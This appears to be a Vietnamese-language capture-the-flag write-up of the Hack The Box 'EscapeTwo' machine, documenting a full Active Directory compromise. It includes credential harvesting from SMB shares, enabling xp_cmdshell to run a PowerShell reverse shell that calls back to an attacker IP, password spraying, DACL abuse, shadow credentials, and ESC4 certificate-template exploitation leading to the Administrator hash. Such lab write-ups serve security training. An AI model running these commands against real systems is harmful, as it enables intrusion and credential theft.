--- # System prepended metadata title: EscapeTwo --- ![image](https://hackmd.io/_uploads/BkACjPPcZx.png) ``` ┌──(root㉿lyquockhanh)-[~/Documents/HTB/EscapeTwo] └─# nmap -sC -sV 10.10.11.51 -oA /root/Documents/HTB/EscapeTwo/escapetwo Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-31 09:42 EDT Nmap scan report for escapetwo.htb (10.10.11.51) Host is up (0.35s latency). Not shown: 988 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-05-31 13:43:32Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=DC01.sequel.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:, DNS:DC01.sequel.htb | Not valid before: 2024-06-08T17:35:00 |_Not valid after: 2025-06-08T17:35:00 |_ssl-date: 2025-05-31T13:45:03+00:00; +31s from scanner time. 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=DC01.sequel.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:, DNS:DC01.sequel.htb | Not valid before: 2024-06-08T17:35:00 |_Not valid after: 2025-06-08T17:35:00 |_ssl-date: 2025-05-31T13:45:03+00:00; +31s from scanner time. 1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM |_ssl-date: 2025-05-31T13:45:03+00:00; +31s from scanner time. | ms-sql-ntlm-info: | 10.10.11.51:1433: | Target_Name: SEQUEL | NetBIOS_Domain_Name: SEQUEL | NetBIOS_Computer_Name: DC01 | DNS_Domain_Name: sequel.htb | DNS_Computer_Name: DC01.sequel.htb | DNS_Tree_Name: sequel.htb |_ Product_Version: 10.0.17763 | ms-sql-info: | 10.10.11.51:1433: | Version: | name: Microsoft SQL Server 2019 RTM | number: 15.00.2000.00 | Product: Microsoft SQL Server 2019 | Service pack level: RTM | Post-SP patches applied: false |_ TCP port: 1433 | ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback | Not valid before: 2025-05-31T13:37:15 |_Not valid after: 2055-05-31T13:37:15 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=DC01.sequel.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:, DNS:DC01.sequel.htb | Not valid before: 2024-06-08T17:35:00 |_Not valid after: 2025-06-08T17:35:00 |_ssl-date: 2025-05-31T13:45:03+00:00; +30s from scanner time. 3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name) |_ssl-date: 2025-05-31T13:45:03+00:00; +31s from scanner time. | ssl-cert: Subject: commonName=DC01.sequel.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:, DNS:DC01.sequel.htb | Not valid before: 2024-06-08T17:35:00 |_Not valid after: 2025-06-08T17:35:00 Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: 30s, deviation: 0s, median: 30s | smb2-security-mode: | 3:1:1: |_ Message signing enabled and required | smb2-time: | date: 2025-05-31T13:44:25 |_ start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 136.42 seconds ``` Các dịch vụ đang mở là : DNS , KERBEROS , LDAP , SMB , MSSQL , winRM , LDAPS Thông tin quan trọng : * Domain : sequel.htb * DNS : DC01.sequel.htb - Microsoft SQL Server 2019 Thêm tên miền escapetwo.htb vào /etc/hosts ``` ┌──(root㉿lyquockhanh)-[~/Documents/HTB/EscapeTwo] └─# echo "10.10.11.51 dc01.sequel.htb sequel.htb" | sudo tee -a /etc/hosts 10.10.11.51 dc01.sequel.htb sequel.htb ``` ![image](https://hackmd.io/_uploads/SkTMhPwqbx.png) Chúng ta có thông tin xác thực tài khoản rose / KxEPkKe6R8su Với thông tin xác thực được cung cấp ta sẽ cố gắng kết nối với dịch vụ (SMB , MSSQL , LDAP ..) Đầu tiên ta sẽ tìm kiếm các chia sẻ SMB bằng thông tin xác thực của mình Tìm kiếm thông tin người dùng smb ``` crackmapexec smb escapetwo.htb -u "rose" -p "KxEPkKe6R8su" --rid-brute | grep SidTypeUser ``` Kết nối từ xa vào giao thức smb thông qua thông tin xác thực của người dùng rose đã có ``` ┌──(root㉿lyquockhanh)-[~/Documents/HTB/EscapeTwo] └─# smbclient -L //10.10.11.51 -U rose -m SMB2 Password for [WORKGROUP\rose]: Sharename Type Comment --------- ---- ------- Accounting Department Disk ADMIN$ Disk Remote Admin C$ Disk Default share IPC$ IPC Remote IPC NETLOGON Disk Logon server share SYSVOL Disk Logon server share Users Disk Reconnecting with SMB1 for workgroup listing. do_connect: Connection to 10.10.11.51 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND) Unable to connect with SMB1 -- no workgroup available ``` hận thấy  có quyền truy cập vào hai thư mục dùng chung là **Accounting Department** và **Users** Truy cập vào thư mục **Accounting\Department** bằng thông tin xác thực . Ta tìm được file excel ta tải về máy và đọc file . ``` ┌──(root㉿lyquockhanh)-[~/Documents/HTB/EscapeTwo] └─# smbclient //10.10.11.51/Accounting\ Department -U rose Password for [WORKGROUP\rose]: Try "help" to get a list of possible commands. smb: \> ls . D 0 Sun Jun 9 06:52:21 2024 .. D 0 Sun Jun 9 06:52:21 2024 accounting_2024.xlsx A 10217 Sun Jun 9 06:14:49 2024 accounts.xlsx A 6780 Sun Jun 9 06:52:07 2024 6367231 blocks of size 4096. 868375 blocks available smb: \> get accounts.xlsx getting file \accounts.xlsx of size 6780 as accounts.xlsx (4.0 KiloBytes/sec) (average 4.0 KiloBytes/sec) smb: \> get accounting_2024.xlsx getting file \accounting_2024.xlsx of size 10217 as accounting_2024.xlsx (5.9 KiloBytes/sec) (average 5.0 KiloBytes/sec) ``` Ta mở file với chức open and repair trên Microsoft excel và thu được bảng sau ``` | First Name | Last Name  | Email                | Username | Password          | |------------|------------|----------------------|----------|-------------------| | Angela     | Martin     | angela@sequel.htb     | angela   | 0fwz7Q4mSpurIt99  | | Oscar      | Martinez   | oscar@sequel.htb      | oscar    | 86LxLBMgEWaKUnBG   | | Kevin      | Malone     | kevin@sequel.htb      | kevin    | Md9Wlq1E5bZnVDVo  | | NULL       | NULL       | sa@sequel.htb         | sa       | MSSQLP@ssw0rd!    | ``` Ta có bộ username : sa  và password : MSSQLP@ssw0rd! Khả năng là username và password của Sql trong máy chủ đích Ta sử dụng thông tin xác thực sa để kết nối mssql máy chủ đích ` ``` ┌──(root㉿lyquockhanh)-[~/Documents/HTB/EscapeTwo] └─# impacket-mssqlclient sa:'MSSQLP@ssw0rd!'@10.10.11.51 Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies [*] Encryption required, switching to TLS [*] ENVCHANGE(DATABASE): Old Value: master, New Value: master [*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english [*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192 [*] INFO(DC01\SQLEXPRESS): Line 1: Changed database context to 'master'. [*] INFO(DC01\SQLEXPRESS): Line 1: Changed language setting to us_english. [*] ACK: Result: 1 - Microsoft SQL Server (150 7208) [!] Press help for extra shell commands SQL (sa dbo@master)> enable_xp_cmdshell INFO(DC01\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install. INFO(DC01\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install. SQL (sa dbo@master)> xp_cmdshell hostname output ------ DC01 NULL SQL (sa dbo@master)> exec xp_cmdshell "chdir" output ------------------- C:\Windows\system32 NULL SQL (sa dbo@master)> EXEC sp_configure 'xp_cmdshell', 1; INFO(DC01\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install. SQL (sa dbo@master)> RECONFIGURE; SQL (sa dbo@master)> EXEC sp_configure 'xp_cmdshell'; name minimum maximum config_value run_value ----------- ------- ------- ------------ --------- xp_cmdshell 0 1 1 1 SQL (sa dbo@master)> exec xp_cmdshell "chdir" output ------------------- C:\Windows\system32 NULL SQL (sa dbo@master)> ``` ``` ┌──(root㉿lyquockhanh)-[~/Documents/HTB/EscapeTwo] └─# impacket-mssqlclient sa:'MSSQLP@ssw0rd!'@10.10.11.51 Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies [*] Encryption required, switching to TLS [*] ENVCHANGE(DATABASE): Old Value: master, New Value: master [*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english [*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192 [*] INFO(DC01\SQLEXPRESS): Line 1: Changed database context to 'master'. [*] INFO(DC01\SQLEXPRESS): Line 1: Changed language setting to us_english. [*] ACK: Result: 1 - Microsoft SQL Server (150 7208) [!] Press help for extra shell commands SQL (sa dbo@master)> EXEC xp_cmdshell 'whoami'; ERROR(DC01\SQLEXPRESS): Line 1: SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online. SQL (sa dbo@master)> SQL (sa dbo@master)> EXEC sp_configure 'show advanced options', 1; INFO(DC01\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install. SQL (sa dbo@master)> RECONFIGURE; SQL (sa dbo@master)> SQL (sa dbo@master)> EXEC sp_configure 'xp_cmdshell', 1; INFO(DC01\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install. SQL (sa dbo@master)> RECONFIGURE; SQL (sa dbo@master)> SQL (sa dbo@master)> EXEC xp_cmdshell 'whoami'; output -------------- sequel\sql_svc NULL SQL (sa dbo@master)> SQL (sa dbo@master)> EXEC xp_cmdshell 'powershell -nop -w hidden -c "$client = New-Object System.Net.Sockets.TCPClient(''10.10.16.59'',293);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes,0,$bytes.Length)) -ne 0){$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback = (iex $data 2>&1 | Out-String);$sendback2 = $sendback + ''PS '' + (pwd).Path + ''> '';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}"' ``` ``` ┌──(root㉿lyquockhanh)-[~] └─# nc -lvnp 293 listening on [any] 293 ... connect to [10.10.16.59] from (UNKNOWN) [10.10.11.51] 50025 whoami sequel\sql_svc PS C:\Windows\system32> cd C:\SQL2019\ExpressAdv_ENU PS C:\SQL2019\ExpressAdv_ENU> ls Directory: C:\SQL2019\ExpressAdv_ENU Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 6/8/2024 3:07 PM 1033_ENU_LP d----- 6/8/2024 3:07 PM redist d----- 6/8/2024 3:07 PM resources d----- 6/8/2024 3:07 PM x64 -a---- 9/24/2019 10:03 PM 45 AUTORUN.INF -a---- 9/24/2019 10:03 PM 788 MEDIAINFO.XML -a---- 6/8/2024 3:07 PM 16 PackageId.dat -a---- 9/24/2019 10:03 PM 142944 SETUP.EXE -a---- 9/24/2019 10:03 PM 486 SETUP.EXE.CONFIG -a---- 6/8/2024 3:07 PM 717 sql-Configuration.INI -a---- 9/24/2019 10:03 PM 249448 SQLSETUPBOOTSTRAPPER.DLL PS C:\SQL2019\ExpressAdv_ENU> cat sql-Configuration.INI [OPTIONS] ACTION="Install" QUIET="True" FEATURES=SQL INSTANCENAME="SQLEXPRESS" INSTANCEID="SQLEXPRESS" RSSVCACCOUNT="NT Service\ReportServer$SQLEXPRESS" AGTSVCACCOUNT="NT AUTHORITY\NETWORK SERVICE" AGTSVCSTARTUPTYPE="Manual" COMMFABRICPORT="0" COMMFABRICNETWORKLEVEL=""0" COMMFABRICENCRYPTION="0" MATRIXCMBRICKCOMMPORT="0" SQLSVCSTARTUPTYPE="Automatic" FILESTREAMLEVEL="0" ENABLERANU="False" SQLCOLLATION="SQL_Latin1_General_CP1_CI_AS" SQLSVCACCOUNT="SEQUEL\sql_svc" SQLSVCPASSWORD="WqSZAF6CysDQbGb3" SQLSYSADMINACCOUNTS="SEQUEL\Administrator" SECURITYMODE="SQL" SAPWD="MSSQLP@ssw0rd!" ADDCURRENTUSERASSQLADMIN="False" TCPENABLED="1" NPENABLED="1" BROWSERSVCSTARTUPTYPE="Automatic" IAcceptSQLServerLicenseTerms=True PS C:\SQL2019\ExpressAdv_ENU> ``` Ta tìm được 2 thông tin quan trọng ``` SQLSVCACCOUNT="SEQUEL\sql_svc" SQLSVCPASSWORD="WqSZAF6CysDQbGb3" ``` ``` ┌──(root㉿lyquockhanh)-[~/Documents/HTB/EscapeTwo] └─# cat user.txt angela oscar kevin sa sql_svc ryan ``` ``` ┌──(root㉿lyquockhanh)-[~/Documents/HTB/EscapeTwo] └─# nxc smb 10.10.11.51 -u user.txt -p 'WqSZAF6CysDQbGb3' SMB 10.10.11.51 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:sequel.htb) (signing:True) (SMBv1:False) SMB 10.10.11.51 445 DC01 [-] sequel.htb\angela:WqSZAF6CysDQbGb3 STATUS_LOGON_FAILURE SMB 10.10.11.51 445 DC01 [-] sequel.htb\oscar:WqSZAF6CysDQbGb3 STATUS_LOGON_FAILURE SMB 10.10.11.51 445 DC01 [-] sequel.htb\kevin:WqSZAF6CysDQbGb3 STATUS_LOGON_FAILURE SMB 10.10.11.51 445 DC01 [-] sequel.htb\sa:WqSZAF6CysDQbGb3 STATUS_LOGON_FAILURE SMB 10.10.11.51 445 DC01 [+] sequel.htb\sql_svc:WqSZAF6CysDQbGb3 ``` ``` ┌──(root㉿lyquockhanh)-[~/Documents/HTB/EscapeTwo] └─# nxc ldap 10.10.11.51 -u user.txt -p 'WqSZAF6CysDQbGb3' SMB 10.10.11.51 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:sequel.htb) (signing:True) (SMBv1:False) LDAP 10.10.11.51 389 DC01 [-] sequel.htb\angela:WqSZAF6CysDQbGb3 LDAP 10.10.11.51 389 DC01 [-] sequel.htb\oscar:WqSZAF6CysDQbGb3 LDAP 10.10.11.51 389 DC01 [-] sequel.htb\kevin:WqSZAF6CysDQbGb3 LDAP 10.10.11.51 389 DC01 [-] sequel.htb\sa:WqSZAF6CysDQbGb3 LDAP 10.10.11.51 389 DC01 [+] sequel.htb\sql_svc:WqSZAF6CysDQbGb3 ``` ``` ┌──(root㉿lyquockhanh)-[~/Documents/HTB/EscapeTwo] └─# nxc winrm 10.10.11.51 -u user.txt -p 'WqSZAF6CysDQbGb3' WINRM 10.10.11.51 5985 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:sequel.htb) WINRM 10.10.11.51 5985 DC01 [-] sequel.htb\angela:WqSZAF6CysDQbGb3 WINRM 10.10.11.51 5985 DC01 [-] sequel.htb\oscar:WqSZAF6CysDQbGb3 WINRM 10.10.11.51 5985 DC01 [-] sequel.htb\kevin:WqSZAF6CysDQbGb3 WINRM 10.10.11.51 5985 DC01 [-] sequel.htb\sa:WqSZAF6CysDQbGb3 WINRM 10.10.11.51 5985 DC01 [-] sequel.htb\sql_svc:WqSZAF6CysDQbGb3 WINRM 10.10.11.51 5985 DC01 [+] sequel.htb\ryan:WqSZAF6CysDQbGb3 (Pwn3d!) ``` Tìm được username : ryan và password : WqSZAF6CysDQbGb3 để kết nối từ xa tới hệ thống thông qua giao thức winrm ``` ┌──(root㉿lyquockhanh)-[~/Documents/HTB/EscapeTwo/Certify] └─# evil-winrm -i 10.10.11.51 -u ryan -p WqSZAF6CysDQbGb3 Evil-WinRM shell v3.7 Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\ryan\Documents> cd ../ *Evil-WinRM* PS C:\Users\ryan> cd Desktop *Evil-WinRM* PS C:\Users\ryan\Desktop> ls Directory: C:\Users\ryan\Desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -ar--- 5/31/2025 6:37 AM 34 user.txt *Evil-WinRM* PS C:\Users\ryan\Desktop> cat user.txt f38ad9d224f1a9606fc05501f433f763 ``` ![image](https://hackmd.io/_uploads/H1CYnwP9-g.png) Bây giờ đã có một shell và đã liệt kê, tôi muốn khởi động Bloodhound và đánh dấu tất cả người dùng mà chúng tôi có thông tin xác thực hợp lệ là sở hữu và xem chúng tôi có những đường dẫn tấn công nào để nâng cao đặc quyền. ``` ┌──(root㉿lyquockhanh)-[~/Documents/HTB/EscapeTwo] └─# bloodhound-python -u 'ryan' -p 'WqSZAF6CysDQbGb3' -d sequel.htb -dc DC01.sequel.htb -ns 10.10.11.51 -c All --zip INFO: Found AD domain: sequel.htb INFO: Getting TGT for user WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (DC01.sequel.htb:88)] [Errno 111] Connection refused INFO: Connecting to LDAP server: DC01.sequel.htb INFO: Found 1 domains INFO: Found 1 domains in the forest INFO: Found 1 computers INFO: Connecting to LDAP server: DC01.sequel.htb INFO: Found 10 users INFO: Found 59 groups INFO: Found 2 gpos INFO: Found 1 ous INFO: Found 19 containers INFO: Found 0 trusts INFO: Starting computer enumeration with 10 workers INFO: Querying computer: DC01.sequel.htb INFO: Done in 01M 20S INFO: Compressing output into 20250531102900_bloodhound.zip ``` Chúng ta có thể thấy rằng người dùng sở hữu của chúng ta là Ryan là “WriteOwner” trên CA_SVC. ![image](https://hackmd.io/_uploads/ryaA3DvcWe.png) ![image](https://hackmd.io/_uploads/HJPxavw9Wg.png) ``` ┌──(root㉿lyquockhanh)-[~/Documents/HTB/EscapeTwo] └─# impacket-owneredit -action write -new-owner ryan -target ca_svc sequel.htb/ryan:WqSZAF6CysDQbGb3 Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies [*] Current owner information below [*] - SID: S-1-5-21-548670397-972687484-3496335370-512 [*] - sAMAccountName: Domain Admins [*] - distinguishedName: CN=Domain Admins,CN=Users,DC=sequel,DC=htb [*] OwnerSid modified successfully! ``` ``` ──(root㉿lyquockhanh)-[~/Documents/HTB/EscapeTwo] └─# impacket-dacledit -action write -rights FullControl -principal ryan -target ca_svc sequel.htb/ryan:WqSZAF6CysDQbGb3 Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies [*] DACL backed up to dacledit-20250531-110856.bak [*] DACL modified successfully! ``` ``` ┌──(root㉿lyquockhanh)-[~/Documents/HTB/EscapeTwo] └─# certipy-ad shadow auto -u 'ryan@sequel.htb' -p 'WqSZAF6CysDQbGb3' -account ca_svc -dc-ip 10.10.11.51 Certipy v4.8.2 - by Oliver Lyak (ly4k) [*] Targeting user 'ca_svc' [*] Generating certificate [*] Certificate generated [*] Generating Key Credential [*] Key Credential generated with DeviceID '3b939dea-960e-93eb-58ac-185a70924994' [*] Adding Key Credential with device ID '3b939dea-960e-93eb-58ac-185a70924994' to the Key Credentials for 'ca_svc' [*] Successfully added Key Credential with device ID '3b939dea-960e-93eb-58ac-185a70924994' to the Key Credentials for 'ca_svc' [*] Authenticating as 'ca_svc' with the certificate [*] Using principal: ca_svc@sequel.htb [*] Trying to get TGT... [*] Got TGT [*] Saved credential cache to 'ca_svc.ccache' [*] Trying to retrieve NT hash for 'ca_svc' [*] Restoring the old Key Credentials for 'ca_svc' [*] Successfully restored the old Key Credentials for 'ca_svc' [*] NT hash for 'ca_svc': 3b181b914e7a9d5508ea1e20bc2b7fce \ ``` ``` ┌──(root㉿lyquockhanh)-[~/Documents/HTB/EscapeTwo] └─# certipy-ad find -u 'ca_svc' -hashes ':3b181b914e7a9d5508ea1e20bc2b7fce' -stdout -vulnerable -dc-ip 10.10.11.51 Certipy v4.8.2 - by Oliver Lyak (ly4k) [*] Finding certificate templates [*] Found 34 certificate templates [*] Finding certificate authorities [*] Found 1 certificate authority [*] Found 12 enabled certificate templates [*] Trying to get CA configuration for 'sequel-DC01-CA' via CSRA [!] Got error while trying to get CA configuration for 'sequel-DC01-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error. [*] Trying to get CA configuration for 'sequel-DC01-CA' via RRP [*] Got CA configuration for 'sequel-DC01-CA' [*] Enumeration output: Certificate Authorities 0 CA Name : sequel-DC01-CA DNS Name : DC01.sequel.htb Certificate Subject : CN=sequel-DC01-CA, DC=sequel, DC=htb Certificate Serial Number : 152DBD2D8E9C079742C0F3BFF2A211D3 Certificate Validity Start : 2024-06-08 16:50:40+00:00 Certificate Validity End : 2124-06-08 17:00:40+00:00 Web Enrollment : Disabled User Specified SAN : Disabled Request Disposition : Issue Enforce Encryption for Requests : Enabled Permissions Owner : SEQUEL.HTB\Administrators Access Rights ManageCertificates : SEQUEL.HTB\Administrators SEQUEL.HTB\Domain Admins SEQUEL.HTB\Enterprise Admins ManageCa : SEQUEL.HTB\Administrators SEQUEL.HTB\Domain Admins SEQUEL.HTB\Enterprise Admins Enroll : SEQUEL.HTB\Authenticated Users Certificate Templates 0 Template Name : DunderMifflinAuthentication Display Name : Dunder Mifflin Authentication Certificate Authorities : sequel-DC01-CA Enabled : True Client Authentication : True Enrollment Agent : False Any Purpose : False Enrollee Supplies Subject : False Certificate Name Flag : SubjectRequireCommonName SubjectAltRequireDns Enrollment Flag : AutoEnrollment PublishToDs Private Key Flag : 16842752 Extended Key Usage : Client Authentication Server Authentication Requires Manager Approval : False Requires Key Archival : False Authorized Signatures Required : 0 Validity Period : 1000 years Renewal Period : 6 weeks Minimum RSA Key Length : 2048 Permissions Enrollment Permissions Enrollment Rights : SEQUEL.HTB\Domain Admins SEQUEL.HTB\Enterprise Admins Object Control Permissions Owner : SEQUEL.HTB\Enterprise Admins Full Control Principals : SEQUEL.HTB\Cert Publishers Write Owner Principals : SEQUEL.HTB\Domain Admins SEQUEL.HTB\Enterprise Admins SEQUEL.HTB\Administrator SEQUEL.HTB\Cert Publishers Write Dacl Principals : SEQUEL.HTB\Domain Admins SEQUEL.HTB\Enterprise Admins SEQUEL.HTB\Administrator SEQUEL.HTB\Cert Publishers Write Property Principals : SEQUEL.HTB\Domain Admins SEQUEL.HTB\Enterprise Admins SEQUEL.HTB\Administrator SEQUEL.HTB\Cert Publishers [!] Vulnerabilities ESC4 : 'SEQUEL.HTB\\Cert Publishers' has dangerous permissions ``` Phát hiện lỗ hổng ESC4 ``` certipy-ad req -username ca_svc@sequel.htb -p 'Password123!!' -ca sequel-DC01-CA - template DunderMifflinAuthentication -target dc01.sequel.htb -upn administrator@sequel.htb ``` ``` ──(root㉿lyquockhanh)-[~] └─# nano /etc/resolv.conf ┌──(root㉿lyquockhanh)-[~] └─# cat /etc/resolv.conf # Generated by NetworkManager search localdomain nameserver 10.10.11.51 ``` ``` ┌──(root㉿lyquockhanh)-[~] └─# certipy-ad template -u ca_svc@sequel.htb -target sequel.htb \ -template DunderMifflinAuthentication \ -hashes ':3b181b914e7a9d5508ea1e20bc2b7fce' \ -save-old -debug Certipy v4.8.2 - by Oliver Lyak (ly4k) [+] Trying to resolve 'sequel.htb' at '10.10.11.51' [+] Trying to resolve 'SEQUEL.HTB' at '10.10.11.51' [+] Authenticating to LDAP server [+] Bound to ldaps://10.10.11.51:636 - ssl [+] Default path: DC=sequel,DC=htb [+] Configuration path: CN=Configuration,DC=sequel,DC=htb [*] Saved old configuration for 'DunderMifflinAuthentication' to 'DunderMifflinAuthentication.json' [*] Updating certificate template 'DunderMifflinAuthentication' [+] MODIFY_DELETE: [+] pKIExtendedKeyUsage: [] [+] msPKI-Certificate-Application-Policy: [] [+] MODIFY_REPLACE: [+] nTSecurityDescriptor: [b'\x01\x00\x04\x9c0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x02\x00\x1c\x00\x01\x00\x00\x00\x00\x00\x14\x00\xff\x01\x0f\x00\x01\x01\x00\x00\x00\x00\x00\x05\x0b\x00\x00\x00\x01\x05\x00\x00\x00\x00\x00\x05\x15\x00\x00\x00\xc8\xa3\x1f\xdd\xe9\xba\xb8\x90,\xaes\xbb\xf4\x01\x00\x00'] [+] flags: [b'0'] [+] pKIDefaultKeySpec: [b'2'] [+] pKIKeyUsage: [b'\x86\x00'] [+] pKIMaxIssuingDepth: [b'-1'] [+] pKICriticalExtensions: [b'2.5.29.19', b'2.5.29.15'] [+] pKIExpirationPeriod: [b'\x00@\x1e\xa4\xe8e\xfa\xff'] [+] pKIDefaultCSPs: [b'1,Microsoft Enhanced Cryptographic Provider v1.0'] [+] msPKI-Enrollment-Flag: [b'0'] [+] msPKI-Private-Key-Flag: [b'16842768'] [+] msPKI-Certificate-Name-Flag: [b'1'] [*] Successfully updated 'DunderMifflinAuthentication' ``` ``` ┌──(root㉿lyquockhanh)-[~] └─# certipy-ad req -u ca_svc@sequel.htb -target sequel.htb \ -upn administrator@sequel.htb \ -ca sequel-DC01-CA -template DunderMifflinAuthentication \ -dc-ip 10.10.11.51 \ -hashes ':3b181b914e7a9d5508ea1e20bc2b7fce' \ -key-size 4096 -debug Certipy v4.8.2 - by Oliver Lyak (ly4k) [+] Trying to resolve 'sequel.htb' at '10.10.11.51' [+] Generating RSA key [*] Requesting certificate via RPC [+] Trying to connect to endpoint: ncacn_np:10.10.11.51[\pipe\cert] [+] Connected to endpoint: ncacn_np:10.10.11.51[\pipe\cert] [*] Successfully requested certificate [*] Request ID is 11 [*] Got certificate with UPN 'administrator@sequel.htb' [*] Certificate has no object SID [*] Saved certificate and private key to 'administrator.pfx' ``` ``` ──(root㉿lyquockhanh)-[~] └─# ntpdate 10.10.11.51 2025-06-04 23:34:06.426353 (-0400) -1252.248469 +/- 0.107174 10.10.11.51 s1 no-leap CLOCK: time stepped by -1252.248469 ┌──(root㉿lyquockhanh)-[~] └─# certipy-ad auth -pfx administrator.pfx -dc-ip 10.10.11.51 Certipy v4.8.2 - by Oliver Lyak (ly4k) [*] Using principal: administrator@sequel.htb [*] Trying to get TGT... [*] Got TGT [*] Saved credential cache to 'administrator.ccache' [*] Trying to retrieve NT hash for 'administrator' [*] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:7a8d4e04986afa8ed4060f75e5a0b3ff ``` ``` ┌──(root㉿lyquockhanh)-[~] └─# evil-winrm -i 10.10.11.51 -u Administrator -H 7a8d4e04986afa8ed4060f75e5a0b3ff Evil-WinRM shell v3.7 Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop *Evil-WinRM* PS C:\Users\Administrator\Desktop> dir Directory: C:\Users\Administrator\Desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -ar--- 6/4/2025 12:40 PM 34 root.txt *Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt 9ae6967f3c8d7de1703571cf8e57d09e ``` ![image](https://hackmd.io/_uploads/S1Bvpwvq-e.png) ![image](https://hackmd.io/_uploads/ByusRwP9Zl.png)